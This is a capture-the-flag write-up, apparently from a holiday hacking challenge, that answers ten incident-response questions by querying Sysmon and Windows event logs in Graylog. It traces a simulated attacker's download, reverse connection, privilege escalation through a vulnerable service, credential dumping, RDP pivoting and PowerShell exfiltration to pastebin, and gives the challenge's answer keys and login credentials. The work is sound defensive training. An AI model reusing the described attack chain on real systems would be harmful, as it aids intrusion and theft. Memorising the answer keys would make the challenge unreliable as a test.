Location: Dorm

This could be run in the terminal, but it was also accessible at the following URLs: Graylog data - https://graylog.elfu.org/ Incident Report - https://report.elfu.org/

The credentials to the former were provided by Pepper Minstix (elfustudent/elfustudent).

The Incident Report Questions are shown below and after each answer was entered a solution was provided:

Question 1

Minty CandyCane reported some weird activity on his computer after he clicked on a link in Firefox for a cookie recipe and downloaded a file.

What is the full-path + filename of the first malicious file downloaded by Minty?

Answer: C:\Users\minty\Downloads\cookie_recipe.exe

We can find this searching for sysmon file creation event id 2 with a process named firefox.exe and not junk .temp files. We can use regular expressions to include or exclude patterns:

TargetFilename:/.+.pdf/

Question 2

The malicious file downloaded and executed by Minty gave the attacker remote access to his machine. What was the ip:port the malicious file connected to first?

Answer: 192.168.247.175:4444

We can pivot off the answer to our first question using the binary path as our ProcessImage.

Question 3

What was the first command executed by the attacker?

(answer is a single word)

Answer: whoami

Since all commands (sysmon event id 1) by the attacker are initially running through the cookie_recipe.exe binary, we can set its full-path as our ParentProcessImage to find child processes it creates sorting on timestamp.

Question 4

What is the one-word service name the attacker used to escalate privileges?

Answer: webexservice

Continuing on using the cookie_reciper.exe binary as our ParentProcessImage, we should see some more commands later on related to a service.

Question 5

What is the file-path + filename of the binary ran by the attacker to dump credentials?

Answer: C:\cookie.exe

The attacker elevates privileges using the vulnerable webexservice to run a file called cookie_recipe2.exe. Let's use this binary path in our ParentProcessImage search.

Question 6

The attacker pivoted to another workstation using credentials gained from Minty's computer. Which account name was used to pivot to another machine?

Answer: alabaster

Windows Event Id 4624 is generated when a user network logon occurs successfully. We can also filter on the attacker's IP using SourceNetworkAddress.

At this point, I noted “the starting host is elfu-res-wks1 at 2019-11-19 05:45:15.000”

Question 7

What is the time ( HH:MM:SS ) the attacker makes a Remote Desktop connection to another machine?

Answer: 06:04:28

LogonType 10 is used for successful network connections using the RDP client.

Question 8

The attacker navigates the file system of a third host using their Remote Desktop Connection to the second host. What is the SourceHostName,DestinationHostname,LogonType of this connection?

(submit in that order as csv)

Answer: elfu-res-wks2,elfu-res-wks3,3

The attacker has GUI access to workstation 2 via RDP. They likely use this GUI connection to access the file system of of workstation 3 using explorer.exe via UNC file paths (which is why we don't see any cmd.exe or powershell.exe process creates). However, we still see the successful network authentication for this with event id 4624 and logon type 3.

Question 9

What is the full-path + filename of the secret research document after being transferred from the third host to the second host?

Answer: C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf

We can look for sysmon file creation event id of 2 with a source of workstation 2. We can also use regex to filter out overly common file paths using something like:

AND NOT TargetFilename:/.+AppData.+/

Question 10

What is the IPv4 address (as found in logs) the secret research document was exfiltrated to?

Answer: 104.22.3.84

We can look for the original document in CommandLine using regex.

When we do that, we see a long a long PowerShell command using Invoke-Webrequest to a remote URL of https://pastebin.com/post.php.

We can pivot off of this information to look for a sysmon network connection id of 3 with a source of elfu-res-wks2 and DestinationHostname of pastebin.com.